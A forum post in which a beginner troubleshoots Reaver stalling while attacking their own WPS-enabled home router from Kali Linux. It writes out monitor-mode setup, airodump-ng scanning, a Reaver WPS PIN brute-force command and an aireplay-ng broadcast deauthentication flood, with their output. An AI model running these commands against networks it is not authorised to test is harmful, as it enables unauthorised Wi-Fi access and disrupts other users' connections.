I downloaded the latest Kali Linux last week and I am booting from a live DVD. My laptop is an HP Elitebook 850 with an Intel Wireless 7260 AC. I am new to Kali Linux but I've been doing a lot of research, reading documentation, looking thru forums, Youtube videos, etc. I am trying to see if I can hack my home wireless AP using Reaver, it's a Linksys EA2700 and it does have WPS turned on. I am about 10 ft away from it so range is not a problem. I was able to get pretty far on my own and I got Reaver started but it's stuck at switching channels, I even left it running overnight. Also, I am not running this from VM or anything, booting from my laptop to the Live DVD. After booting, here's what I type:
Then I stop the Network Manager and kill all the processes that can cause trouble.Code:root@kali:~# iwconfig eth0 no wireless extensions. wlan0 IEEE 802.11abgn ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:on
Code:root@kali:~# service network-manager stop root@kali:~# airmon-ng check kill Killing these processes: PID Name 1328 wpa_supplicant
Now I put the interface in Monitor Mode
Now I set the interface on channel 1 because my AP is on channel 1. I know this step seems a bit backwards because I haven't run Airodump yet to scan for the SSIDs but having gone thru these steps numerous times, I already know my AP is on channel 1. I did read in some of the forums that some people had better luck with setting the channel prior to turning on "monitor mode" but this is the only way I could get it to work.Code:root@kali:~# airmon-ng start wlan0 No interfering processes found PHY Interface Driver Chipset phy0 wlan0 iwlwifi Intel Corporation Wireless 7260 (rev 73) (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0)
Code:root@kali:~# iwconfig wlan0mon channel 1
Now I run Airodump-ng to scan for the wireless networks around me.
Code:root@kali:~# airodump-ng wlan0mon CH 2 ][ Elapsed: 18 s ][ 2015-08-29 21:03 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 20:AA:4B:92:AF:4B -48 24 28 0 1 54e WPA2 CCMP PSK SepiaFlamingo 02:AA:4B:92:AF:4C -49 23 0 0 1 54e OPN SepiaFlamingo-guest BSSID STATION PWR Rate Lost Frames Probe 20:AA:4B:92:AF:4B 60:02:B4:D1:C7:8E -29 0 - 0e 8 3 20:AA:4B:92:AF:4B 00:21:6A:A7:C2:9E -36 0e- 1e 1812 29
Press CTRL-C to exit out of Airodump. Optionally, I also ran the command: WASH (to show the wireless APs that has WPS enabled but I didn't need this because it's my home AP so I know it has WPS enabled)
Then I ran Reaver and this is the part where it gets stuck. It just keeps cycling thru the channels.
I read somewhere if you have trouble associating to try to use Aireplay. I had two terminal windows open, one with Airodump and the other one with Aireplay. Here's my output from that but Reaver still wouldn't work, even after using Aireplay.Code:root@kali:~# reaver -i wlan0mon -b 20:AA:4B:92:AF:4B -S -N -a -w -vv Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> mod by t6_x <[email protected]> & DataHead & Soxrok2212 [+] Waiting for beacon from 20:AA:4B:92:AF:4B [+] Switching wlan0mon to channel 1 [+] Switching wlan0mon to channel 2 [+] Switching wlan0mon to channel 1
Code:root@kali:~# aireplay-ng -0 0 -a 20:AA:4B:92:AF:4B wlan0mon 21:31:12 Waiting for beacon frame (BSSID: 20:AA:4B:92:AF:4B) on channel 1 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 21:31:12 Sending DeAuth to broadcast -- BSSID: [20:AA:4B:92:AF:4B] 21:31:12 Sending DeAuth to broadcast -- BSSID: [20:AA:4B:92:AF:4B]
Anybody have any ideas how to fix this?
